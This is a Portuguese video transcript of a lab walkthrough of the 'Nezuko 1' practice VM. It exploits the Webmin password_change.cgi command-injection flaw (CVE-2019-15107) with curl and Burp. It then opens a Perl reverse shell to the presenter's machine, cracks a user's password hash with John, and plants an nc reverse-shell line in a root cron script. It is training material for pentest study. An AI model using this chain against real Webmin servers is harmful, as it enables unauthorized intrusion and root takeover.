vamos começar a nossa 17ª máquina. Essa máquina é a Nezuko 1. Foi bem tranquilo subir essa máquina aqui, né? Já é um arquivo .ova. Então essa máquina aqui, ela tem uma vulnerabilidade no WebMin. A gente já explorou o WebMin aqui no começo utilizando o Metasploit, né? E dessa vez a gente vai explorar ele manualmente e entender um pouco mais sobre a falha. Então essa falha ela foi apresentada na DEFCON de 2018 e o, o WebMin, para quem não sabe o que, que é o WebMin, ele é uma ferramenta, né, que é uma interface web para administradores de sistemas like a Unix, que os caras conseguem editar alguns arquivos de configuração por dentro do WebMin, né, utilizando um browser moderno. Então a ideia em si já é ruim, né, do ponto de vista de segurança, mas facilita a vida aí de administradores de sistemas, né. Quando rolou a exposição dessa falha aí do WebMin, teve um movimento grande aí na comunidade, porque olha o exemplo aqui, né, no Shodan aqui, os caras mostrando mais de 218 mil alvos vulneráveis a essa vulnerabilidade aqui. Então, realmente foi um negócio muito sério, né, que esse post aqui é de agosto de 2019. Então, com certeza tem muito WebMin ainda que não foi corrigido, né? Aqui no post do Arcus, aqui no site dele, ele mostra bem, foi ele que desenvolveu o exploit, então ele mostra bem certinho como funciona o exploit e aqui tem a publicação de como ele chegou até esse RCE. Então esse RCE ele é dentro do arquivo passwordchange.cgi aqui, que esse arquivo, essa função, né, esse arquivo dentro da aplicação, ele faz a troca da senha de quem esqueceu a senha. Então, até essa reportagem aqui fala, né, sobre essa matéria aqui fala sobre hackers que implantaram um backdoor no WebMin dentro do repositório oficial para forçar ele já vir com a configuração default habilitado o reset de password, porque daí você consegue fazer a requisição maliciosa para inserir comandos, né, para fazer o RCE. Então, como é que funciona aqui? Precisa estar com essa função habilitada dentro do WebMin e quando ela está habilitada nessa função, você consegue chamar o CGI bin aqui esse password change.cgi aqui fora do contexto logado ali da aplicação, né? E passar alguns parâmetros para ele. Aqui, ó, ele mostra o exemplo aqui dele fazendo a requisição, né? Passando o usuário e uma senha para uma troca de senha para esse usuário, né? Aqui fazendo uma requisição post no password inline change e depois ele faz o RCE no meio do usuário aqui, ó. Ele passa o usuário e passa um operador lógico aqui e um comando. Então ele tem a resposta aqui, ó, dessa saída, né? Do que o servidor realmente executa o comando que ele passa lá. Então ele explica aqui dentro do código, né? Que é dentro do PHP aqui, a função que é responsável aí por fazer essa troca da senha na hora que ela vai fazer o movimento de encriptar o password aqui, ele não tem uma serialização legal ali e ele consegue então inserir comandos no server, né? Então ele até fala aqui no começo sobre esse movimento todo que aconteceu aí do backdoor e tal, que teve um grupo de hackers aparentemente aí que conseguiu comprometer o repositório oficial do WebMin e habilitar para geral, né? A hora que o cara faz o download do repositório oficial ele já vem habilitado essa feature do password change ali, o que já permite executar o RCE, né? Então não precisa nem se autenticar para executar o RCE. Então ele tem um módulo lá no Metasploit, mas a gente vai executar na mão esse cara aqui, beleza? Aqui tem mais detalhes sobre a CVE, né? Mostra aqui os pesquisadores que postaram as coisas no Twitter sobre isso e tal. Então, depois que a gente fizer a exploração dessa máquina, a gente vai se movimentar de usuário dentro da máquina e após a exploração a gente vai explorar o Chrome também, igual na máquina anterior. A gente fez uma exploração do Chrome, beleza? Vamos para a parte prática aqui. Então vou dar um sudo nmap "-p- para escanear todas as 65.535 portas, "-sv para ver a versão dos serviços, né, V maiúsculo, "-v de verboso, 192.68.2.36 foi o IP que pegou aqui na minha infra.
Esperar ele rodar aqui. Opa, acho que deu BO e não sei se é esse IP mesmo, deixa eu ver. Dá o Net Discovery aqui pra ver que IP que pegou ali a máquina. Ah, eu sei o que é. Eu reiniciei minha máquina aqui, ela tem duas interfaces. Aí criei uma interface que vai para a internet aqui. Aí ele estava com a interface 2 de pé e não a 1. Então agora vai rolar aqui. Beleza, ó, pegou o IP35 aqui. Então a gente já vê que está com a porta 22, a 80 e a 13337 aqui aberta, né? Então vamos esperar ele terminar de rodar aqui. Passei o parâmetro "-sv" para a gente ver a versão dos serviços também, né? Vamos esperar aqui, ó, o scan rodar. Aqui ele está rodando em todas as 65.535 portas, então ele demora um pouquinho mesmo. Enquanto isso a gente pode já ir abrindo aqui a porta 80 no browser aqui para dar uma olhada. 192.68.2.35. Então, aparentemente não tem nada rodando aqui, né? A gente já pode abrir também essa 13337 aqui enquanto está rodando lá, só para a gente ver o que ele vai responder aqui. Ele já terminou aqui de rodar. Ele não mostrou o que está rodando na 1337, mas está rodando com um SSL. Então a gente vai tentar abrir no browser aqui para ver o que está rodando, né? Como tem SSL, vamos por um HTTPS aqui na frente. Esperar ele abrir aqui. Então a gente vê aqui que está rodando na 13337, né, um WebMin. Então se você procurar aqui no Search Exploit, WebMin, ele tem vários exploits aqui, né? O que interessa pra gente nesse caso aqui é na versão 1920 aqui, ó, que é o RCE, aquele que a gente viu ali no começo. Então você pode dar um search exploit "-m" para copiar esse exploit para cá, né? Eu já fiz a cópia aqui. 47293.sh. Então, se a gente for entender aqui o que o exploit faz, né? Ele faz uma requisição lá na aplicação, ó, e nessa requisição, então ele faz um seu URL, né, "-ks" aqui. Vamos ver aqui no seu URL o que é o parâmetro "-k". Aqui eu já esqueci o que é. Ele está permitindo requisições inseguras, né? Quando tem SSL e é igual a gente fez no browser ali, né? Permitindo uma requisição insegura, porque ele tem o certificado, mas deve estar expirado o certificado, então você tem que passar o "-insecure" aqui, né? Ou "-k" para ele conseguir fazer essa requisição. O S é de silent, né? Então ele faz a requisição em modo silencioso. O /URI aqui é o primeiro argumento que o script recebe. Então a gente pode editar aqui o script e colocar, né, https
https, dois pontos barra barra. Não, acho que eu não vou nem colocar aqui. Vamos fazer o seguinte. Eu vou apagar aqui o flag e o RI e vamos já editar o comando direto aqui. A primeira linha aqui, ele só está dando um echo-n, né? Testando a CVE 2019-15-007. Vamos rapar fora esse cara. Então deixar só o seu URL. Aqui no lugar do URI a gente coloca o https, dois pontos barra barra. Opa. Peraí que eu caguei o... Deixa eu abrir ele aqui no browser que é mais fácil da gente ver. Spot é webmin RCE. Então aqui ó, ele está fazendo esse URI ele passa por ele está recebendo por parâmetro, né? Então ele está dando primeiro ele faz um echo-n aqui para dizer que ele está testando o RCE, né, da CVE 2019-15-107, né, no alvo que a gente selecionou. Então ele dá um seu URL permitindo o modo inseguro de SSL, né, com um S de silent. Então ele passa o endereço da requisição dentro de passwordchange.cgi. Se a gente vier aqui na pesquisa do cara aqui que descobriu a falha, né, ele faz essa mesma requisição aqui, ó, faz um post dentro do password_change.cgi e ele passa aqui embaixo, né, alguns parâmetros. Então essa requisição que a gente está vendo aqui no script é a mesma coisa, ó, ele faz a requisição no passwordchange.cgi, menos D de data para passar os dados da requisição que ele está fazendo. Então ele passa aqui o parâmetro user, passa um usuário, né? O pan aqui ele deixa em branco, o expired ele seta o valor 2 aqui, da mesma forma que ele aqui, ó, expired 2. E depois ele passa aqui dentro do old, né, que seria a senha antiga, ele passa uma senha qualquer e concatena com um comando aqui. Então ele mandou ler a flag, que é essa variável que está escrita aqui, e depois ele passa a nova senha, né, e a confirmação da nova senha. Aí no header, aqui "-h" é de header, ele passa o cookie com redirect 1, teste em 1, né, seed igual a x e session test igual a 1, que é o cookie lá da aplicação, né. Ainda no header, ele passa o content type no formato application xwwform um URL encoded, porque ele está passando o parâmetro encodado, né? E ele faz a referência aqui com o session_login.cgi, que é onde o cara se loga na aplicação lá. Depois ele dá um grep para mostrar a flag, né, que ele rodou aqui nesse comando dele. Então a gente pode pegar o comando aqui do seu URL, ó, ao invés de editar o script, vamos direto no comando aqui. Deixa eu sair desse cara aqui. Aqui nesse seu URL, ó, eu vou trocar o barra URI aqui pro nosso alvo, né? http dois pontos barra barra https, né? https dois pontos barra barra 192.68.2.35, né? 35 é 36, não lembro, deixa eu ver aqui. 35. 35 barra passwordchange.cgi, né? Pra gente ver se está funcionando esse cara aí, você pode vir aqui e dar um barra passwordchange. Se tiver desabilitado, né, o módulo de recovery de password lá, a aplicação não vai estar vulnerável, você não consegue chamar aqui o password change.cgi. Então quando a gente chama ele aqui, ele vai ter que dar um erro, né, que a gente não passou nenhum password para ser alterado. Então ele vai dar um erro aqui na requisição, ó. Tá vendo que ele deu falha, ó, porque ele não encontrou o password? Então a gente faz a alteração dele aqui, ó, né, dentro desse dado que a gente está passando no "-d" aqui, ó, a gente vai passar um usuário qualquer aqui. Deixa eu trocar o comando que ele concatenou aqui, ó. Dentro do old aqui, ele passou como se a senha antiga fosse ID. Então aqui a gente pode passar um name-a, por exemplo. E o resto aqui ele vai passar a nova senha e a confirmação da nova senha, né? Depois os cookies deixa tudo como tá. Os cookies já vem certinho aqui no exploit e tal.
Só a referência aqui que eu vou ter que alterar também para https dois pontos barra barra 192.68.2.35. Na porta, muito importante isso, 13337. Vai ter que fazer isso aqui no começo também, que eu não passei a porta. Aí ele vai requisitar lá no limbo, né? Não vai ter nada lá. 13337. Então, a gente fazendo essa requisição aqui agora, ó, ele deu um name-a em algum lugar aqui no meio desse código. Vamos fazer um... Pera aí. Deixa eu filtrar para ficar mais fácil. Deixa eu passar o ifconfig, que aí vai aparecer maior ali no meio dessa bagunça toda aqui. Eu sei que ele rodou o name-a, mas está no meio desse monte de código aí da página. Então, pera aí. Então aqui no meio da requisição, ó, ele traz todo o código da página, né? E aqui, ó, ele deu um ifconfig lá dentro da máquina, ó, tá vendo? Ó? Vamos trocar o comando aqui, ó. Ali onde está o ifconfig, vou inserir outro comando. Bom, essa é a exploração utilizando o exploit aqui que está lá no exploit.db, né? Mas a gente consegue fazer ela via burp também, da mesma forma que o pesquisador mostrou ali para a gente na pesquisa dele. Então, vou colocar aqui, por exemplo, um netstat menos anpt. Ó, ele mostrou aqui as portas abertas e tal, né, as requisições lá dentro. Ó, tá vendo? Tá funcionando o nosso RCE. Então ele está trazendo todo o código da página, né, e dentro do código ele está inserindo aqui os comandos que a gente tá executando. Então a gente pode vir aqui no burp. Eu já deixei pronta aqui a requisição, né, mas para você fazer essa requisição aqui é só você habilitar o proxy e chamar o webmin normalmente lá, né? Daí você clica com o direito e joga no repeater aqui, aí você consegue começar a alterar aqui as requisições. Então essa é a requisição padrão que ele faz aqui, ó, né? Passou um usuário qualquer, né? Uma senha antiga e uma senha nova, né? Então aqui, ó, olhando a pesquisa aqui do, do cara aqui, a gente consegue ver que é exatamente esse padrão aqui de requisição que é feito normalmente, né? Essa é a requisição padrão do sistema, para realmente alterar a senha, né? Então, se a gente chamar ela aqui, ó, você pode ver aqui no render, ó, demora um pouquinho para renderizar, ele vai trazer para a gente um erro, né, na tela ali, mostrando que o usuário e a senha, ó, ele deu falha na hora de trocar o usuário e senha, né, que essa senha está incorreta. Então, se você pegar aqui dentro de algum desses parâmetros, né, e usar um ou aqui, vou botar, por exemplo, aqui um name-a. Deixa eu ver se ele vai assim ou se a gente vai ter que encodar aqui. Talvez tenha que encodar a requisição. Esperar ele carregar. Ó, tá vendo? Ele puxou o name-a aqui dentro, né? Então, se vier no HAL aqui, ó, você vai conseguir ver que aqui, ó, dentro do H3, aqui na linha 44, ele inseriu aqui, ó, Linux Ubuntu 4.18, generic e tal. Então ele está funcionando aqui o nosso RCE. Então agora a gente pode rodar aqui dentro, né, alguma shell. Então, não, nos meus testes aqui não funcionou a shell de Python e nem o Netcat nesse cara aqui. Então, nos testes que eu fiz, eu vim aqui no Pentest Monkey e peguei uma shell de Perl, porque tem Perl rodando nessa máquina. Então aqui, ó, essa shell de Perl ela é exatamente igual, né, à shell de Python ali, só que ela é feita em Perl. Então a gente vai copiar ela aqui. Você pode testar com outras aí também, né, que você quiser. Eu vou vir aqui no decoder, ó. Eu inseri a shell aqui, vou alterar o IP aqui. 192.168.2.5, que é o IP do meu Kali, né, na 443 como sempre. E você pode mandar encodar como URL, ó, ele vai virar esse stringzão gigante aqui. Você pode vir no teu repeater aqui e inserir depois do A aqui, ó,
esse comando. Por que que eu encodei, né? Porque aqui dentro dele, ó, tem vários ponto e vírgula, aspas, e se você mandar dessa forma, ele vai crashar o comando. Você precisa encodar para ele poder mandar como um comando só. Se você não encodar, não vai passar. Ele vai dar erro, né? Vai dar internal server error. Lá você vai crashar o CGI. Então se, opa, eu mandei aqui sem abrir sem abrir o handler, aí não adianta nada, né? Então se você vier aqui no Kali agora, ó, deixa eu fechar aqui, sudnc-nlvp para escutar em modo verboso, né, na 443. Deixa eu abrir de novo o burp aqui. Então se a gente mandar a requisição agora, ó, ele abriu a sessão aqui com a gente. Então a gente pegou aqui o usuário Nezuko. Foi o primeiro usuário que a gente pegou aqui na máquina, né? Então eu vou spawnar aqui um PTY, import PTY. Opa, faltou as pinhas aqui. Import PTY, pty.spawn barra bin barra bash. Ih, vai dar ruim. Tem que ter Python 3 aqui, ó. Pera aí. Python 3. "-c import pty pty.spawn barra bin barra bash". Agora vai. Opa, escrevi spwn. Bugou meu Kali aqui, ó. Não consigo utilizar o bash direito. Acontece isso quando ele estoura a memória aqui. Então tá zoado de memória. Preciso aumentar a memória aqui. Python 3 import pty.spawn barra bin barra bash. Agora vai. Import pty.spawn barra bin barra bash. O que eu fiz de errado aqui? Ah, faltou "-c de linha de comando. Aí não vai, né? Ai, Python 3, viu? Sem edição é assim mesmo. "-c import". Aí travou tudo. Import pty.spawn barra bin barra bash. Aí, até que enfim. Beleza, então você pode fazer, né, várias buscas aqui para encontrar como escalonar privilégio aqui, né? No fim das contas, você pode procurar várias coisas aqui, vai chegar um momento que você vai esgotar o que procurar, né? Dá para ver que aqui, ó, em barra home, dentro de Nezuko aqui, ó, que é o meu usuário, né, que a gente conseguiu aqui, ele tem aqui umas mensagens que ele recebe do Zenitsu aqui, ó. From Zenitsu. Ó, ele recebe umas mensagens aqui. Então, tem aqui dentro dessa máquina tá rodando, né, um POSIX que tá mandando essas mensagens. Ó, se der um ps-out aqui, grep root, você vai ver aqui que tem um POSIX rodando como root aqui, que está mandando essas mensagens. Bom, a gente não consegue ver aqui. Eu vou rodar aqui aquela mesma ferramenta que a gente utilizou na máquina anterior, o PSPy, né? Deixa eu abrir ela aqui. Cola é o diretório que eu salvo meus cheats aqui, né? Então eu tenho vários cheats salvos aqui, né? Tipo o de shells e tal. É importante vocês fazerem isso também. Eu chamo de cola meu cheat aqui, mas você pode. É legal você ter um diretório onde você deixa os seus cheats, porque a gente nunca vai lembrar de cabeça de todos os comandos, né, que a gente tem aí que
executar aí durante o teste. Então, se você não tiver um diretório para você consultar, você vai acabar se perdendo. Então, por isso que eu deixo algumas coisas que eu preciso salvas aqui. Por exemplo, a gente compilou na máquina anterior o PSPy, eu deixei ele compilado aqui e agora eu só vou jogar ele lá para o server. Então, vou dar um Python "-m simple http server" na 8081. Então, aqui eu vou no /tmp wget http 192.168.2.1, que é o IP daquela máquina onde está o salvo meus cheats ali, né? Na porta 8081, opa, na porta 8081 /pspy. Então ele já baixou aqui o pspy, né? Vou dar um chmod mais x para poder executar ele. Então se a gente chamar ele aqui agora, ó, a gente vai conseguir ver os processos, né, que estão rodando em outros usuários aqui, principalmente no usuário root. Então, o legal dessa ferramenta aqui é que a gente consegue ver até os comandos que foram executados, né? Então, se a gente ficar esperando aqui para ver o que está rodando, né? Ó, já deu para ver aqui que tem qual usuário que está rodando o miniserve, ó, tá tudo aparecendo aqui. Até a gente conectado aqui, ó, com o SH aqui, a gente rodou o Perl lá, ó. Então tudo aparece aqui, né, nos processos, né, inclusive a gente. Então se a gente seguir escutando aqui os processos para ver o que vai rolar, em algum momento vai rodar algum cron, alguma coisa, alguém vai se conectar aqui na máquina, vai rodar algum processo, né? Então na vida real você poderia ficar escutando aí, esperando alguma coisa acontecer. Então a gente vai esperar aqui mais um pouquinho para ver o que está acontecendo aqui nessa máquina. A gente consegue ver já que tem, por exemplo, está rodando o WPS Supplicant lá, então isso já mostra que tem uma interface gráfica lá no server, porque ele está se comunicando, o WPS Supplicant aqui, talvez não, né, mas o WPS Supplicant ele serve para fazer a conexão de wireless, então é bem difícil que um servidor esteja conectado via wireless, né, então já mostra que talvez seja uma workstation. Então a gente deduz que talvez tenha uma interface gráfica. E a gente vai abaixando aqui para ver os outros processos, né? Aqui está rodando um Splash, ó, então já dá para saber que tem interface gráfica mesmo. A gente continua esperando para ver o que vai rodar aqui, porque ó, a gente já sabe que tem um cron aqui rodando. Então vamos esperar para ver, a gente não sabe de quanto em quanto tempo roda o cron, né? Vamos esperar para ver a hora que rodar o cron a gente conseguir saber, ou ter alguma informação aí. Lembrando que o ID 0 é o ID de root, né? Então tem várias coisas rodando como root aqui. Olha, acabou de mandar usar o Network Manager aqui, ó, usuário root. Então vamos esperar para ver o que está rolando aqui. A gente tá interceptando os processos, né? Tá vendo os processos que estão rodando em todos os usuários. Então é legal que ele mostra o PID aqui do processo e mostra também qual foi o comando executado para startar esse processo. Bom, enquanto não acontece nada aqui, deixa eu sair aqui e abrir de novo a sessão. Vamos adiantando aqui as coisas. Deixa eu abrir de novo aqui, beleza? Se você for aqui no /home, você vai ver que tem dois usuários, né? Se entrar no Zenitsu aqui, a gente tem permissão para entrar no usuário dele, mas não consegue executar nada aqui. Zenitsu. Então aqui, ó, ele tem uma pastinha chamada Tonezuko aqui, ó. Com o nosso usuário, a gente não conseguiu ver nada rodando ainda aqui de interessante, né? Então, ó, mas tem um script aqui, ó, que chama send message to Nezuko. Se você der um cat nele aqui, .sh, você vê que ele está pegando a data aqui e está mandando uma mensagem, né? E se você for ler as mensagens que o Nezuko recebe, é exatamente essa mesma mensagem aqui, ó. Então, isso já mostra que alguma coisa está rodando para mandar essa mensagem. Então, se a gente der um cat no /etc/pswd aqui no Zenitsu, ó, ele tem o hash da credencial aqui do Zenitsu.
A gente pode copiar ela aqui e vir aqui no nosso bash aqui, né? Vou chamar de Zenitsu PES o arquivo aqui, vou jogar esse hash aqui dentro. Então se a gente der um sudo john aqui no Zenitsu PES, pera aí que não deu certo. Deixa eu editar aqui esse cara aqui. Opa, pera aí que eu buguei tudo aqui. Vamos tirar essa parte aqui e deixar só o hash aqui. Pera aí. Ó, tá salvo aqui, né, o hash inteiro da mesma forma como está salvo lá no /tc/pswd. Então aqui ó, Zenitsu, né, o hash do Zenitsu e as informações sobre o ID, esse ID, onde que é o home, né? A gente já viu isso em outras máquinas aqui. Eu salvei dessa mesma forma ele dentro de um arquivo de texto aqui. Então se você rodar um John, sudo John, dentro do arquivo que a gente criou aqui, depois de rodar o John aqui, né, ele demorou um pouquinho para quebrar, mas aqui tá ele trouxe pra gente, né, que a senha do Zenitsu é miau miau. A gente utilizou o word list default do John aqui, né? Então, na hora que você colar da mesma forma que está escrito aqui o hash da credencial e você rodar o teu John aí, utilizando a word list default mesmo aqui do John, você vai ver que a senha do Zenitsu é miau miau. Então aqui a gente vai dar vai se logar com o Zenitsu, né? Python 3. Tem que spawnar o TTY, senão a gente não consegue trocar de usuário. -c de comando, import pty, pty.spawn /bin /bash. Então a gente pode dar um su agora Zenitsu. E ele está pedindo a senha do Zenitsu, né? Como a gente viu é meow, meow. Então agora a gente conseguiu se conectar aí com o próximo usuário, né? Que é o Zenitsu. Então, agora com o Zenitsu, a gente consegue alterar o arquivo message to Nezuko, porque ele é o owner aqui do arquivo. Mas aqui só para mostrar para vocês como está rodando o cron como root, lá no tmp de novo, vou rodar aqui o pspy. Para a gente poder ver aqui o cron rodando e chamando, né, o arquivo ali para que ele escreva a mensagem. Então, ó, repare que ele rodou, né, o cron aqui agora. Você consegue ver que o ID aqui é 0. Então, ele rodou aqui um /bin bash home zenitsu tonezuko send message tonezuko. Ou seja, o cron está rodando na máquina aqui como root, executando esse script que manda a mensagem aqui .sh, né? Então, na vida real aí você pode fazer a mesma coisa, ficar escutando aí na máquina, né? Escutando, fazendo análise de tráfego, escutando aqui quais são os processos que estão rodando para você conseguir entender o comportamento. É, Como ele demora de 3 a 5 minutos para rodar, né, eu expliquei para vocês primeiro ali sobre o send message, mas como é que eu descobri isso, né? Foi escutando aqui o processo e a gente consegue ver aqui que o cron está rodando com esse cara. Então se a gente, eu vou parar ele aqui, né? Abrir de novo a nossa sessão. Opa.
Legal. Agora não vai abrir a sessão de volta. Espera aí. Então, vamos de volta aqui que deu um BOzinho. Vamos no decoder aqui. Deixa eu trocar a porta aqui só para ter certeza que às vezes ela ficou rodando lá. Deixa eu pôr aqui a 8080, pode ser. Aqui no repeater, né? A gente inseriu aqui no old, manda um operador lógico aqui e joga a nossa shell. Deixa eu colocar para rodar na 8080 aqui. Abriu a sessão, beleza. Agora tudo de novo. Python -c import pty pty.spawn bin /bash. Então agora que a gente viu que ele está rodando, né, que esse cara está rodando aí como root, né, de 3 a 5 minutos, a gente precisa então alterar esse cara. Então, agora que a gente descobriu tudo isso, a gente não consegue fazer isso com o usuário Nezuko. Por isso que a gente precisa, né, se conectar com o usuário Zenitsu. Zenitsu, a gente já quebrou a senha dele mesmo, né? A gente já viu aqui que é miau miau a senha. Miau miau. Beleza, então aqui agora, ó, editor Nezuko. Esse cara ele tem permissão de escrever no send message. Então a gente pode escrever aqui, ó, um echo nc 192.68.2.5, que é o IP do Kali, na porta 80. Vamos executar um bin /bash. A gente escreve isso EOF, né, no final do arquivo, dá dois operadores de saída aqui para jogar isso no final do arquivo. No send message underline to underline nezuko.sh. Então agora se a gente der um cat aqui no send message underline nezuko underline sh, no final aqui a gente conseguiu escrever o nosso INC. Então a gente pode até sair daqui já, que a gente viu que isso vai rodar, né, como root. Então a gente starta aqui o nosso handler, sudo nc -nlvp para escutar em modo verboso na porta 80, que foi o que a gente deixou executando lá. Então agora a gente sabe que, né, no próximo momento aqui, assim que ele executar o cron, né, a gente vai conseguir abrir a sessão. Eu vou até fazer a conexão de volta lá para a gente poder acompanhar o processo. Opa, o que deu aqui? Ah, tá escutando ainda. Para a gente acompanhar o processo, então deixa eu dar um sudo nc nlvp na porta 8080 que a gente abriu lá o handler, né? Deixa eu executar ele aqui de novo. Na verdade, você não precisa fazer isso que eu estou fazendo agora, é mais para a gente poder ver o processo lá, né? cd/tmp ./pspy, só para a gente poder acompanhar aqui o processo, para a gente ver a hora que ele rodar o cron, você vai ver que assim que ele rodar o cron, ele vai executar, abrir a sessão aqui com a gente, né? Vamos esperar um pouquinho. Realmente ele leva de 3 a 5 minutos, então vamos esperar.
começou a mostrar sinal de vida aí, já rodou o Network Manager lá. Então da outra vez, ó, opa, rodou aqui, ó. Acabou de rodar o Chrome lá e a gente conseguiu a conexão aqui. Então agora se, deixa eu fechar esse cara aqui. Então a gente recebeu a conexão aqui, ó, a gente já recebeu a conexão como root. Então, porque foi o root que rodou o cron lá, né? Então a gente conseguiu aqui o nosso acesso como root. root.txt para pegar a nossa flag aqui. Então tá aqui a nossa flag de root. Bom, espero que vocês estejam gostando das máquinas aí. Essa aqui ela só foi um pouco trabalhosa, né? Por conta de ter que ficar esperando os processos rodarem aí. Então, aqui na descrição tá os links, né, de material de apoio para os estudos aí. Então, se tiver alguma dúvida, manda lá no nosso grupo. Aqui embaixo também está disponível o link da VM de amanhã. Se você não se inscreveu no canal aqui ainda, se inscreve aí para dar uma força pra gente. E lembrando que quem está participando do desafio, né, se não, não estiver inscrito no canal, não vai receber o certificado. Beleza? Obrigado aí pela presença de vocês e até amanhã, galera. Falou!